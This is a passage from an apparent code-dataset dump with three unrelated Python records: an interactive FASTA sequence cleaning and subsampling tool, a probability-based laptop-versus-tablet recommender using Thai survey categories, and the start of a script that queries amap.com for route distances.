unique sequence names\r\n removedLines = [] # removed lines recorded in case needed for output\r\n newLines = [] # each unique line from inputLines\r\n\r\n # Show example tag field values to aid user\r\n def processTag(tag):\r\n '''\r\n If tag length above threshold, replace with\r\n truncation plus '...'\r\n '''\r\n if len(tag) > 30:\r\n return tag[:27] + '...'\r\n return tag\r\n\r\n print('Example tag values:')\r\n print()\r\n tags1 = inputLines[0].split(Cleanup.splitChar)\r\n tags2 = inputLines[-1].split(Cleanup.splitChar)\r\n if len(tags1) != len(tags2):\r\n print('Number of fields in first and last entries not equal')\r\n quit()\r\n for i in range(len(tags1)):\r\n print('%d %-30s %-30s'\r\n % (i, processTag(tags1[i]), processTag(tags2[i])))\r\n print()\r\n\r\n try:\r\n colsComp = list(map(int, input(\"Enter the tag numbers for which duplicates will 
be compared by (starts at 0, comma-separated): \").split(\",\")))\r\n except Exception:\r\n print(\"Please type numbers separated by commas\")\r\n quit()\r\n\r\n for line in inputLines:\r\n # Include everything but the sequence\r\n # Removes sequences with exactly duplicate tags\r\n tags = \"\"\r\n for col in colsComp:\r\n tags += line.rstrip().split(Cleanup.splitChar)[col]\r\n\r\n if tags in lineTags:\r\n removedLines.append(tags)\r\n # uncomment to print duplicates\r\n # print(line.rstrip().split(Cleanup.splitChar)[0])\r\n else:\r\n newLines.append(line)\r\n lineTags.append(tags)\r\n\r\n print(\"REMOVED DUP COUNT: \" + str(len(removedLines)) )\r\n return newLines\r\n\r\n # remove rows of low length\r\n def removeSparseRows(inputLines):\r\n # Remove length\r\n maxLen = 0\r\n removedLength = []\r\n newLines = []\r\n\r\n threshold = float(input(\"Percent under max length for which lines will be cut (enter .75 for 75%): \"))\r\n for line in inputLines:\r\n curMax = len(line.rstrip().split(Cleanup.splitChar)[-1].replace(\"-\",\"\").replace(\"n\",\"\"))\r\n if (curMax > maxLen):\r\n maxLen = curMax\r\n\r\n for line in inputLines:\r\n sequence = line.rstrip().split(Cleanup.splitChar)[-1].replace(\"-\",\"\").replace(\"n\",\"\")\r\n if len(sequence) < maxLen * threshold:\r\n removedLength.append(line)\r\n else:\r\n newLines.append(line)\r\n\r\n print(\"REMOVED LENGTH COUNT: \" + str(len(removedLength)))\r\n return newLines\r\n\r\n # remove columns with too few nucleotides\r\n def removeSparseCols(inputLines):\r\n # removed columns\r\n threshold = float(input(\"Percent under max length for which columns will be cut (enter .5 for 50%): \"))\r\n countColSize = {}\r\n removedColumns = []\r\n newLines = []\r\n numLines = len(inputLines)\r\n threshold = threshold * numLines\r\n\r\n # Loop through every line, count column sizes\r\n for line in inputLines:\r\n for colNum, char in enumerate(line.rstrip().split(Cleanup.splitChar)[-1]):\r\n if not(colNum in countColSize.keys()):\r\n countColSize[colNum] = 0\r\n if not(char == \"-\" or char == \"n\"):\r\n countColSize[colNum] += 1\r\n\r\n validCols = []\r\n for key in countColSize.keys():\r\n if not(countColSize[key] < threshold):\r\n validCols.append(key)\r\n\r\n # Loop through every line, remove columns under threshold\r\n for line in inputLines:\r\n line = line.rstrip()\r\n tags = Cleanup.splitChar.join(line.split(Cleanup.splitChar)[:-1])\r\n sequence = line.split(Cleanup.splitChar)[-1]\r\n validChars = [sequence[x] for x in validCols]\r\n newLines.append(tags + Cleanup.splitChar\r\n + \"\".join(list(map(str, validChars))))\r\n\r\n removedCount = max(countColSize.keys()) - len(validCols) + 1\r\n print(\"REMOVED COLUMNS COUNT: \" + str(removedCount))\r\n return newLines\r\n\r\n # Apply all cleanup functions\r\n def start():\r\n print(\"*** Starting Fasta Clean ***\")\r\n print(\"** Remove duplicate sequences, remove sparse columns, and remove sparse sequences **\")\r\n\r\n # Read input\r\n (inputLines, Cleanup.splitChar) = inputFile(\"input\")\r\n inputLines = formatInput(inputLines, Cleanup.splitChar)\r\n print(\"INITIAL COUNT: \" + str(len(inputLines)))\r\n\r\n # remove sparse cols, sparse rows, and duplicates\r\n outputLines = Cleanup.removeSparseCols(inputLines)\r\n outputLines = Cleanup.removeSparseRows(outputLines)\r\n outputLines = Cleanup.removeDuplicates(outputLines)\r\n\r\n # format output\r\n Cleanup.outputLines = outputToFas(outputLines, Cleanup.splitChar)\r\n\r\n # Print good lines to output file\r\n print('\\a')\r\n 
outputFile(Cleanup.outputLines)\r\n\r\n\r\n# Change .fas to .csv or .csv to .fas\r\nclass Extension:\r\n\r\n def toCSV(inputLines):\r\n outputLines = []\r\n splitChar = \",\"\r\n # Reformat lines\r\n curSequence = inputLines[0].rstrip().replace(\":\",\"\").replace(\"(\",\"_\").replace(\")\",\"_\").replace(\" \",\"_\").replace(\"\\'\",\"\").replace(\"|\",\",\")\r\n count = 0\r\n for line in inputLines[1:]:\r\n if (\">\" in line):\r\n outputLines.append(curSequence + \"\\n\")\r\n curSequence = line.rstrip().replace(\":\",\"\").replace(\"(\",\"_\").replace(\")\",\"_\").replace(\" \",\"_\").replace(\"\\'\",\"\").replace(\"|\",\",\")\r\n count = 0\r\n else:\r\n if (count == 0):\r\n if (curSequence[-1] == \",\"):\r\n curSequence = curSequence\r\n else:\r\n curSequence = curSequence + splitChar\r\n curSequence = curSequence + line.rstrip()\r\n count += 1\r\n # Add final line, not added by for loop\r\n outputLines.append(curSequence)\r\n return outputLines\r\n\r\n def toFas(inputLines):\r\n outputLines = []\r\n splitChar = \",\"\r\n for line in inputLines:\r\n tags = \"|\".join(line.rstrip().split(splitChar)[:-1])\r\n sequence = line.rstrip().split(splitChar)[-1].rstrip()\r\n outputLines.append(tags + \"\\n\")\r\n count = 0\r\n chunk = \"\"\r\n for char in sequence:\r\n count += 1\r\n chunk = chunk + char\r\n if count == 60:\r\n outputLines.append(chunk + \"\\n\")\r\n chunk = \"\"\r\n count = 0\r\n if len(chunk) != 0:\r\n outputLines.append(chunk + \"\\n\")\r\n return outputLines\r\n\r\n def start():\r\n print(\"*** Starting File Type Switcher ***\")\r\n print(\"** Enter .csv file to change format to .fas, enter .fas file to change format to .csv **\")\r\n\r\n (inputLines, splitChar) = inputFile(\"input\")\r\n if (splitChar == \"|\"):\r\n outputLines = Extension.toCSV(inputLines)\r\n elif (splitChar == \",\"):\r\n outputLines = Extension.toFas(inputLines)\r\n else:\r\n print(\"DEBUG: impossible, file must be .fas or .csv\")\r\n quit()\r\n\r\n outputFile(outputLines)\r\n\r\n\r\nclass Tag:\r\n\r\n def start():\r\n print(\"*** Starting Modify Tags ***\")\r\n print(\"** Input a CSV, first column will be matched to a fasta sequence tag **\")\r\n print(\"** Second column will be added to each matching sequence **\")\r\n print(\"** Input csv should have two columns: **\")\r\n\r\n (inputLines, splitChar) = inputFile(\"sequences fasta\")\r\n inputLines = formatInput(inputLines, Cleanup.splitChar)\r\n\r\n matchLines = inputFile(\"tags csv\")[0]\r\n\r\n # Change tags\r\n matchTagNum = int(input(\"Which number tag is being matched from the sequences (starting at 0): \"))\r\n matchDict = {}\r\n outputLines = []\r\n\r\n for line in matchLines:\r\n line = line.rstrip().split(\",\")\r\n try:\r\n matchDict[line[0]] = line[1]\r\n except Exception:\r\n print(\"Input csv must have two columns\")\r\n quit()\r\n\r\n for line in inputLines:\r\n line = line.rstrip()\r\n tags = line.split(splitChar)\r\n toChange = str(tags[matchTagNum])\r\n if (toChange in matchDict.keys()):\r\n toAdd = matchDict[toChange]\r\n tags[matchTagNum] = toChange + splitChar + toAdd\r\n line = splitChar.join(tags)\r\n outputLines.append(line)\r\n else:\r\n print(\"Missing key for: \" + tags[0] + \" (key is \" + toChange + \")\")\r\n\r\n outputLines = outputToFas(outputLines, splitChar)\r\n outputFile(outputLines)\r\n\r\nclass Genome:\r\n\r\n def start():\r\n print(\"*** Starting genome data set ***\")\r\n print(\"** Input any number of fasta files **\")\r\n print(\"** Enter the tag number for comparison\")\r\n print(\"** Output will be a csv with 
each tag in the inputted number spot that is in a sequence in every file ***\")\r\n\r\n try:\r\n matchTag = int(input(\"Which tag number should be compared (starting at 0): \"))\r\n except Exception:\r\n print(\"Tag must be an integer\")\r\n quit()\r\n\r\n (inputLines, splitChar) = inputFile(\"input\")\r\n inputLines = formatInput(inputLines, splitChar)\r\n tagList = []\r\n\r\n for line in inputLines:\r\n tag = line.rstrip().split(splitChar)[matchTag]\r\n tagList.append(tag)\r\n\r\n cont = input(\"Add another file (y/n): \")\r\n\r\n while (cont == \"y\"):\r\n (tempLines, tempSplitChar) = inputFile(\"input\")\r\n tempLines = formatInput(tempLines, tempSplitChar)\r\n tempTagList = []\r\n validTags = []\r\n\r\n for line in tempLines:\r\n tag = line.rstrip().split(splitChar)[matchTag]\r\n tempTagList.append(tag)\r\n for tag in tagList:\r\n if tag in tempTagList and not(tag in validTags):\r\n validTags.append(tag)\r\n\r\n tagList = validTags\r\n\r\n cont = input(\"Add another file (y/n): \")\r\n\r\n outputFile(\",genome\\n\".join(tagList) + \",genome\")\r\n\r\nclass Subsample:\r\n\r\n def start():\r\n print(\"*** Starting Sequence Subsampler Application ***\")\r\n print(\"** Check readme for use instructions and examples **\")\r\n\r\n # todo move these\r\n #print(\"|** NOMENCLATURE: tags are larger classifications, subtags are the values within the tag (Ex. Location is a tag, Canada is a subtag)\")\r\n #print(\"|** For each of the following inputs the tags and subtags are inputed by the user\")\r\n #print(\"|* ALL tags means every ouput sequence must have these tags (Ex. Every sequence must be from Canada )\")\r\n #print(\"|* OR tags means every output sequence must be in a single OR tag group, each of which has a specified max size (Ex. 5 sequences from every year)\")\r\n #print(\"|* MIN tags means if possible there will be minimum number of sequences in each MIN tag group without conflicting with ALL or OR (Ex. 1 sequence per year for each host type)\")\r\n #print(\"|* NOT tags means no output sequence can have these tags (Ex. 
No sequences with Canada as location)\")\r\n\r\n\r\n # Find file to be subsampled (must be a csv with tags in the first row)\r\n pathname = input(\"Filepath to be subsampled (must be .csv with a head in the first row): \")\r\n try:\r\n inputFile = open(pathname, \"r\")\r\n except Exception:\r\n print(\"File does not exist\")\r\n quit()\r\n\r\n inputLines = inputFile.readlines()\r\n inputFile.close()\r\n\r\n # Stores all tags in first line of file\r\n allTags = [];\r\n for count,tag in enumerate(inputLines[0].rstrip().split(\",\")):\r\n allTags.append((count,tag))\r\n\r\n # Number of each tag\r\n tagNums = [x[0] for x in allTags]\r\n tagNames = [x[1] for x in allTags]\r\n print(\"TAGS FOUND: \")\r\n print(*tagNames, sep=\"\\n\")\r\n\r\n # Remove tag line and randomize input so output will be random\r\n header = inputLines[0]\r\n inputLines = inputLines[1:]\r\n random.shuffle(inputLines)\r\n\r\n # Ask user for which tags they wish to use\r\n tagTypes = input(\"Which subsampling types would you like (of ALL,OR,MIN,NOT)(comma-separated): \").split(\",\")\r\n\r\n # Choose tags which every output sequences must have\r\n if (\"ALL\" in tagTypes):\r\n andTags = input(\"ALL tags (subtags choosen after)(comma-separated): \").split(\",\")\r\n if len([x for x in andTags if not(x in tagNames)]) > 0:\r\n print(\"One of those tags is not valid\")\r\n quit()\r\n else:\r\n andTags = []\r\n\r\n\r\n andTagNums = [x[0] for x in allTags if x[1] in andTags]\r\n andSubTags = {} # A dictionary mapping tags to the specified subtags\r\n # No option for all because that is equal to leaving out the tag\r\n for curTag in andTags:\r\n if curTag == \"Date\" or curTag == \"date\":\r\n try:\r\n startDate = [int(x) for x in input(\"Enter start date (year-month-day): \").split(\"-\")]\r\n endDate = [int(x) for x in input(\"Enter end date (year-month-day): \").split(\"-\")]\r\n except Exception:\r\n print(\"Date must be year-month-day\")\r\n quit()\r\n else:\r\n curInput = input(\"Subtags of \" + curTag + \" (comma-separated): \")\r\n andSubTags[curTag] = curInput.split(\",\")\r\n\r\n # Choose tags for which each all outputs must have one of the subtags\r\n # Will later choose the maximum number each group of subtags can have\r\n if (\"OR\" in tagTypes):\r\n orTags = input(\"OR tags (subtags choosen after)(comma-separated): \").split(\",\")\r\n if len([x for x in orTags if not(x in tagNames)]) > 0:\r\n print(\"One of those tags is not valid\")\r\n quit()\r\n else:\r\n orTags = []\r\n\r\n orTagNums = [x[0] for x in allTags if x[1] in orTags]\r\n orSubTags = {}\r\n for tag in orTags:\r\n if tag == \"Date\" or tag == \"date\":\r\n orDateType = input(\"Date grouped by year (type year) or month (type month): \")\r\n if not(orDateType == \"month\" or orDateType == \"year\"):\r\n print(\"Invalid date type, script will no longer function properly\")\r\n else:\r\n orSubTags[tag] = input(\"Subtags of \" + tag + \" (comma-separated or type ALL): \").split(\",\")\r\n\r\n\r\n # Choose the maximum number of sequences each group can have\r\n # Ex: 5 tags from Canada and 5 tags from UnitedStates\r\n if (\"OR\" in tagTypes):\r\n maxNumSequences = input(\"Number per OR group: \")\r\n try:\r\n temp = int(maxNumSequences)\r\n except Exception:\r\n print(\"Must be an integer\")\r\n quit()\r\n\r\n # Choose tags for which each all outputs must have one of the subtags\r\n # Will later choose the maximum number each group of subtags can have\r\n if (\"OR\" in tagTypes and \"MIN\" in tagTypes):\r\n minTags = input(\"MIN tags (subtags choosen 
after)(comma-separated): \").split(\",\")\r\n else:\r\n minTags = []\r\n\r\n minTagNums = [x[0] for x in allTags if x[1] in minTags]\r\n minSubTags = {}\r\n for tag in minTags:\r\n if tag == \"Date\" or tag == \"date\":\r\n minDateType = input(\"Date grouped by year (type year) or month (type month): \")\r\n if not(minDateType == \"month\" or minDateType == \"year\"):\r\n print(\"Invalid date type, script will no longer function properly\")\r\n quit()\r\n else:\r\n minSubTags[tag] = input(\"Subtags of \" + tag + \" (comma-separated or type ALL): \").split(\",\")\r\n\r\n # Choose the minimum number of sequences each group can have\r\n if (\"OR\" in tagTypes and \"MIN\" in tagTypes):\r\n minNumSequences = input(\"Number per MIN group: \")\r\n try:\r\n temp = int(minNumSequences)\r\n except Exception:\r\n print(\"Must be an integer\")\r\n quit()\r\n print(\"NUMBER CHOOSEN: \" + minNumSequences)\r\n\r\n\r\n # Choose tags which every no output sequences can have\r\n if (\"NOT\" in tagTypes):\r\n notTags = input(\"NOT tags (subtags choosen after)(comma-separated): \").split(\",\")\r\n if len([x for x in notTags if not(x in tagNames)]) > 0:\r\n print(\"One of those tags is not valid\")\r\n quit()\r\n else:\r\n notTags = []\r\n\r\n\r\n notTagNums = [x[0] for x in allTags if x[1] in notTags]\r\n notSubTags = {} # A dictionary mapping tags to the specified subtags\r\n # No option for all because that is equal to leaving out the tag\r\n for curTag in notTags:\r\n if curTag == \"Date\" or curTag ==\"date\":\r\n print(\"No support for date not tags\")\r\n else:\r\n curInput = input(\"Subtags of \" + curTag + \" (comma-separated): \")\r\n notSubTags[curTag] = curInput.split(\",\")\r\n\r\n # Dictionary mapping subtags to a count of how many choosen with that tag\r\n # Used to ensure proper number of each orTag\r\n orSubTagDict = {}\r\n minSubTagDict = {}\r\n\r\n # List that will contain every output line\r\n validLines = [];\r\n\r\n # Loop through every line\r\n for line in inputLines:\r\n # Strip special character such as \\n from end of the line\r\n line = line.rstrip()\r\n lineTags = line.split(\",\")\r\n\r\n # Consider each line to be valid output until proven otherwise\r\n # Innocent until proven guilty\r\n valid = True\r\n\r\n # Key which combines different tags for groups\r\n # For example canada2018, unitedstates2018, canada2019\r\n orFullTag = \"\"\r\n # Used for the minimum groups\r\n minFullTag = \"\"\r\n minValid = True\r\n\r\n # Loop through each subtag of the line\r\n for tagNum, tag in enumerate(lineTags):\r\n\r\n # If tag was choosen as notTag check that the subTag matches\r\n if tagNum in notTagNums:\r\n # Make sure subTag was one of input, otherwise it is not valid output\r\n possibleSubTags = notSubTags[allTags[tagNum][1]]\r\n if (tag in possibleSubTags):\r\n valid = False\r\n\r\n # If tag was choosen as andTag check that the subTag matches\r\n if tagNum in andTagNums:\r\n\r\n # If date do menial string manipulation\r\n if (tagNames[tagNum] == \"Date\" or tagNames[tagNum] == \"date\"):\r\n curDate = tag.split(\"-\")\r\n for i, x in enumerate(curDate):\r\n if (x == ''):\r\n curDate[i] = -1\r\n else:\r\n try:\r\n curDate[i] = int(x)\r\n except Exception:\r\n print(\"ERROR: a entry in the date column is not yyyy-mm-dd, it is: \" + x)\r\n quit()\r\n\r\n correctYear = (curDate[0] >= startDate[0] and curDate[0] <= endDate[0])\r\n\r\n if not(correctYear):\r\n valid = False\r\n elif (correctYear and not(curDate[0] > startDate[0])):\r\n #if current year is the start year\r\n if (curDate[1] == 
-1):\r\n valid = False\r\n elif (curDate[1] == startDate[1]):\r\n if (curDate[2] == -1):\r\n valid = False\r\n elif not(curDate[2] >= startDate[2]):\r\n valid = False\r\n elif not(curDate[1] > startDate[1]):\r\n valid = False\r\n\r\n elif (correctYear and not(curDate[0] < endDate[0])):\r\n #if current year is the end year\r\n if (curDate[1] == -1):\r\n valid = False\r\n elif (curDate[1] == endDate[1]):\r\n if (curDate[2] == -1):\r\n valid = False\r\n elif not(curDate[2] <= endDate[2]):\r\n valid = False\r\n elif not(curDate[1] < endDate[1]):\r\n valid = False\r\n\r\n else:\r\n # Any tag but dateTag\r\n # Make sure subTag was one of input, otherwise it is not valid output\r\n possibleSubTags = andSubTags[allTags[tagNum][1]]\r\n if not(tag in possibleSubTags):\r\n valid = False\r\n\r\n # If inValid ignore so not added to orSubTagDict\r\n if not(valid):\r\n break\r\n\r\n # If tag was choosen as orTag\r\n if tagNum in orTagNums:\r\n if (tagNames[tagNum] == \"Date\" or tagNames[tagNum] == \"date\"):\r\n curDate = tag.split(\"-\")\r\n for i, x in enumerate(curDate):\r\n if (x == ''):\r\n curDate[i] = -1\r\n else:\r\n curDate[i] = int(x)\r\n dateTag = curDate[0]*100\r\n if (orDateType == \"month\"):\r\n dateTag += curDate[1]\r\n\r\n orFullTag = orFullTag + str(dateTag)\r\n else:\r\n # If tag is not date find possible subTags\r\n possibleSubTags = orSubTags[allTags[tagNum][1]]\r\n if (\"ALL\" in possibleSubTags or tag in possibleSubTags):\r\n orFullTag = orFullTag + tag\r\n else:\r\n valid = False\r\n\r\n # If tag was choosen as a minTag\r\n if tagNum in minTagNums:\r\n if (tagNames[tagNum] == \"Date\" or tagNames[tagNum] == \"date\"):\r\n curDate = tag.split(\"-\")\r\n for i, x in enumerate(curDate):\r\n if (x == ''):\r\n curDate[i] = -1\r\n else:\r\n curDate[i] = int(x)\r\n dateTag = curDate[0]*100\r\n if (minDateType == \"month\"):\r\n dateTag += curDate[1]\r\n\r\n minFullTag = minFullTag + str(dateTag)\r\n else:\r\n # If tag is not date find possible subTags\r\n possibleSubTags = minSubTags[allTags[tagNum][1]]\r\n if (\"ALL\" in possibleSubTags or tag in possibleSubTags):\r\n minFullTag = minFullTag + tag\r\n else:\r\n minValid = False\r\n\r\n if valid and minValid and not(minFullTag == \"\"):\r\n if not(minFullTag in minSubTagDict.keys()):\r\n minSubTagDict[minFullTag] = []\r\n if len(minSubTagDict[minFullTag]) < int(minNumSequences):\r\n minSubTagDict[minFullTag].append(line) #TODO: is this necessary?\r\n # instead always add this line, only remove lines when they are greater than minsubtagdict length\r\n else:\r\n minValid = False\r\n\r\n\r\n if valid and not(orFullTag == \"\") and not(orFullTag in orSubTagDict.keys()):\r\n orSubTagDict[orFullTag] = [line]\r\n elif valid and not(orFullTag == \"\") and (len(orSubTagDict[orFullTag]) < int(maxNumSequences)):\r\n orSubTagDict[orFullTag].append(line)\r\n else:\r\n if valid and minValid and not(minFullTag == \"\"):\r\n # remove a line from the same orGroup as the minNumSequences\r\n removed = False\r\n for curToRemove in orSubTagDict[orFullTag]:\r\n # Only want to remove\r\n if not(curToRemove in [v for sublist in minSubTagDict.values() for v in sublist]):\r\n validLines.remove(curToRemove)\r\n orSubTagDict[orFullTag].remove(curToRemove)\r\n orSubTagDict[orFullTag].append(line)\r\n removed = True\r\n break\r\n if not(removed):\r\n minSubTagDict[minFullTag].remove(line)\r\n valid = False\r\n else:\r\n if not(minFullTag == \"\" and orFullTag ==\"\"):\r\n valid = False\r\n\r\n if valid:\r\n validLines.append(line)\r\n\r\n # Resort lines after 
randomization\r\n validLines.sort()\r\n\r\n print(str(len(validLines)) + \" SEQUENCES IN SUBSAMPLE \")\r\n\r\n # Write each sequence to the output file\r\n pathname = input(\"Filepath for output (recommended to be csv)(will create a new file if none exist): \")\r\n outputFile = open(pathname, \"w\")\r\n # Uncomment for output to contain header\r\n # outputFile.write(header)\r\n for line in validLines:\r\n outputFile.write(line + \"\\n\")\r\n inputFile.close()\r\n outputFile.close()\r\n\r\n # Write meta data to a File\r\n outputFile = open(\".metadata.csv\", \"w\")\r\n outputFile.write(\"Key,Size,Elements \\n\")\r\n outputFile.write(\"--- OR GROUPS --- \\n\")\r\n for orKey in orSubTagDict.keys():\r\n outputFile.write(str(orKey) + \",\" + str(len(orSubTagDict[orKey])) + \",\" + str(orSubTagDict[orKey]) + \"\\n\")\r\n outputFile.write(\"--- MIN GROUPS --- \\n\")\r\n for minKey in minSubTagDict.keys():\r\n outputFile.write(str(minKey) + \",\" + str(len(minSubTagDict[minKey])) + \",\" + str(minSubTagDict[minKey]) + \"\\n\")\r\n\r\n outputFile.close()\r\n\r\n\r\ndef start():\r\n print(\"---Starting Fasta Modifcation Tool---\\n\")\r\n loop = \"y\"\r\n\r\n while loop == \"y\":\r\n operation = input(\"What operation (subsample,clean,tag,extension,review,genome): \")\r\n if operation == \"clean\":\r\n Cleanup.start()\r\n elif operation == \"extension\":\r\n Extension.start()\r\n elif operation == \"tag\":\r\n Tag.start()\r\n elif operation == \"subsample\":\r\n Subsample.start()\r\n elif operation == \"review\":\r\n Review.start()\r\n elif operation == \"genome\":\r\n Genome.start()\r\n else:\r\n print(\"Invalid operation\")\r\n print(\"\\n---Operation Done---\")\r\n loop = input(\"Perform another operation (y/n): \")\r\n print(\"\") # equivalent of \"\\n\" after input\r\n quit_success()\r\n\r\n\r\n# Begin script\r\nstart()\r\n","sub_path":"module4/Supporting Materials/fastatool.py","file_name":"fastatool.py","file_ext":"py","file_size_in_byte":35221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"229289031","text":"import pandas as pd\nimport random\ncol_list = [\"attribute\",\"value\",\"laptop\",\"tablet\"]\ndata = pd.read_csv(r'D:\\Worksapce\\VSWorksapce\\prob_data.csv')\n \nclass mymodel:\n #gender [0]\n # faculty[1]\n # price[2]\n #purpose1[3]\n # purpose2[4]\n # purpose3[5]\n #freaquency[6]\n \n def __init__(self, selected):\n self.selected=selected\n self.faculty_num=-1\n self.price_num=-1\n self.purpose1_num=-1\n self.purpose2_num=-1\n self.purpose3_num=-1\n self.freaquency_num=-1\n self.gender_num=-1\n \n \n \n def set_faculty(self,selected):\n if self.selected[1] == \"ครุศาสตร์อุตสาหกรรมและเทคโนโลยี\":\n self.faculty_num=0\n elif self.selected[1]== \"บริหารธุรกิจ\":\n self.faculty_num=1\n elif self.selected[1] == \"วิทยาศาสตร์\":\n self.faculty_num=2\n elif self.selected[1] == \"วิศวกรรมศาสตร์\":\n self.faculty_num=3\n elif self.selected[1] == \"ศิลปศาสตร์\":\n self.faculty_num=4\n elif self.selected[1] == \"สถาปัตยกรรมศาสตร์\":\n self.faculty_num=5\n elif self.selected[1] == \"อุตสาหกรรมอาหาร\":\n self.faculty_num=6\n elif self.selected[1] == \"เทคโนโลยีการเกษตร\":\n self.faculty_num=7\n elif self.selected[1] == \"เทคโนโลยีสารสนเทศ\":\n self.faculty_num=8\n elif self.selected[1] == \"วิทยาลัยนวัตกรรมการผลิตขั้นสูง\":\n self.faculty_num=9\n elif self.selected[1] == \"วิทยาลัยนาโนเทคโนโลยีพระจอมเกล้าลาดกระบ���ง\":\n self.faculty_num=10\n elif self.selected[1] == \"วิทยาลัยวิศวกรรมสังคีต\":\n self.faculty_num=11\n return 
self.faculty_num\n \n def set_price(self,selected): \n if self.selected[2] == \"10,001 - 15,000 บาท\":\n self.price_num=0\n elif self.selected[2]== \"15,001 - 20,000 บาท\":\n self.price_num=1\n elif self.selected[2] == \"20,001 - 25,000 บาท\":\n self.price_num=2\n elif self.selected[2] == \"25,001 - 30,000 บาท\":\n self.price_num=3\n elif self.selected[2]== \"5,001 - 10,000 บาท\":\n self.price_num=4\n elif self.selected[2] == \"น้อยกว่า 5,000 บาท\":\n self.price_num=5\n elif self.selected[2] == \"มากกว่า 30,000 บาท\":\n self.price_num=6\n return self.price_num\n \n def set_purpose1(self,selected): \n if self.selected[3] == \"การศึกษา\":\n self.purpose1_num=0\n elif self.selected[3]== \"ตัดต่อวิดีโอ\":\n self.purpose1_num=1\n elif self.selected[3] == \"วาดรูป\":\n self.purpose1_num=2\n elif self.selected[3] == \"สื่อบันเทิง (สตรีมมิ่งเพลงและวิดีโอต่าง ๆ)\":\n self.purpose1_num=3\n elif self.selected[3]== \"เขียนแบบ , ออกแบบแผนผังต่าง ๆ\":\n self.purpose1_num=4\n elif self.selected[3] == \"เขียนโปรแกรม\":\n self.purpose1_num=5\n elif self.selected[3] == \"เล่นเกม\":\n self.purpose1_num=6\n return self.purpose1_num\n \n def set_purpose2(self,selected): \n if self.selected[4] == \"การศึกษา\":\n self.purpose2_num=0\n elif self.selected[4]== \"ตัดต่อวิดีโอ\":\n self.purpose2_num=1\n elif self.selected[4] == \"ทำเพลง\":\n self.purpose2_num=2\n elif self.selected[4] == \"วาดรูป\":\n self.purpose2_num=3\n elif self.selected[4]== \"สื่อบันเทิง (สตรีมมิ่งเพลงและวิดีโอต่าง ๆ)\":\n self.purpose2_num=4\n elif self.selected[4] == \"เขียนแบบ , ออกแบบแผนผังต่าง ๆ\":\n self.purpose2_num=5\n elif self.selected[4] == \"เขียนโปรแกรม\":\n self.purpose2_num=6\n elif self.selected[4] == \"เล่นเกม\":\n self.purpose2_num=7\n return self.purpose2_num\n \n def set_purpose3(self,selected): \n if self.selected[5] == \"การศึกษา\":\n self.purpose3_num=0\n elif self.selected[5]== \"ตัดต่อวิดีโอ\":\n self.purpose3_num=1\n elif self.selected[5] == \"ทำเพลง\":\n self.purpose3_num=2\n elif self.selected[5] == \"วาดรูป\":\n self.purpose3_num=3\n elif self.selected[5]== \"สื่อบันเทิง (สตรีมมิ่งเพลงและวิดีโอต่าง ๆ)\":\n self.purpose3_num=4\n elif self.selected[5] == \"เขียนแบบ , ออกแบบแผนผังต่าง ๆ\":\n self.purpose3_num=5\n elif self.selected[5] == \"เขียนโปรแกรม\":\n self.purpose3_num=6\n elif self.selected[5] == \"เล่นเกม\":\n self.purpose3_num=7\n return self.purpose3_num\n \n def set_freaquency(self,selected): \n if self.selected[6] == \"1 - 2 วัน\":\n self.freaquency_num=0\n elif self.selected[6]== \"3 - 5 วัน\":\n self.freaquency_num=1\n elif self.selected[6] == \"ทุกวัน\":\n self.freaquency_num=2\n elif self.selected[6] == \"ไม่พกพาเลย\":\n self.freaquency_num=3\n return self.freaquency_num\n \n def set_gender(self,selected): \n if self.selected[0] == \"LGBTQ+\":\n self.gender_num=0\n elif self.selected[0]== \"ชาย\":\n self.gender_num=1\n elif self.selected[0] == \"หญิง\":\n self.gender_num=2 \n return self.gender_num\n \n \n def calculate(self):\n self.faculty_num=self.set_faculty(self.selected)\n self.price_num=self.set_price(self.selected)\n self.purpose1_num=self.set_purpose1(self.selected)\n self.purpose2_num=self.set_purpose2(self.selected)\n self.purpose3_num=self.set_purpose3(self.selected)\n self.freaquency_num=self.set_freaquency(self.selected)\n self.gender_num=self.set_gender(self.selected)\n self.ans_list = [self.faculty_num,self.price_num,self.purpose1_num,self.purpose2_num,\n self.purpose3_num,self.freaquency_num,self.gender_num]\n \n #Group data to calculate \n self.att_list = 
[\"faculty\",\"price\",\"purpose1\",\"purpose2\",\"purpose3\",\"freaquency\",\"gender\"]\n self.table_all= []\n self.i=0\n for self.var in self.att_list :\n self.table_all.append(self.var)\n self.table_all[self.i] = data.groupby(['attribute']).get_group(self.var)\n self.i=self.i+1\n \n #calculate\n \n self.laptop = []\n self.tablet = []\n \n for self.j in range(len(self.ans_list)) :\n self.temp_value = self.table_all[self.j][(self.table_all[self.j]['value']==self.ans_list[self.j])]\n self.temp_value = self.temp_value.iloc[0]\n self.laptop.append(self.temp_value['laptop'])\n self.tablet.append(self.temp_value['tablet'])\n \n self.sum_laptop=1\n self.sum_tablet=1 \n for self.k in range(len(self.laptop)) :\n print(self.laptop[self.k])\n print(self.tablet[self.k])\n self.sum_laptop=self.sum_laptop*self.laptop[self.k]\n self.sum_tablet=self.sum_tablet*self.tablet[self.k]\n \n print (self.sum_laptop)\n print (self.sum_tablet) \n #send final answer\n self.final_ans=-1\n if(self.sum_laptop>self.sum_tablet) :\n self.final_ans=0#laptop\n elif (self.sum_laptop')\n key = re.findall(pattern, res.text)[0]\n\n params = {\n 'usepoiquery': 'true',\n 'coor_need': 'true',\n 'rendertemplate': '1',\n 'invoker': 'plan',\n 'engine_version': '3',\n 'start_types': '1',\n 'end_types': '1',\n 'viapoint_types': '1',\n 'policy2': '1',\n 'fromX': start_lnglat[0],\n 'fromY': start_lnglat[1],\n 'start_poiid': start_location[1],\n 'start_poitype': start_location[2],\n 'start_poiname': start_location[3],\n 'toX': end_lnglat[0],\n 'toY': end_lnglat[1],\n 'end_poiid': end_location[1],\n 'end_poitype': end_location[2],\n 'end_poiname': end_location[3],\n 'key': key,\n 'callback': 'jsonp_990327_'\n }\n url = 'https://www.amap.com/service/autoNavigat?'\n res = requests.get(url, params=params)\n dic = json.loads(\n res.text.replace(\"/**/ typeof jsonp_990327_ === 'function' && jsonp_990327_(\", \"\").replace(\");\", \"\"))\n\n return dic['data']['distance'].split(',')[0]\n\n\ndef get_location(location):\n wd = {\n 'words': location\n }\n url = 'https://www.amap.com/service/poiTipslite?&city=330100&type=dir&' + urllib.parse.urlencode(wd)\n # print(url)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\"\n }\n response = 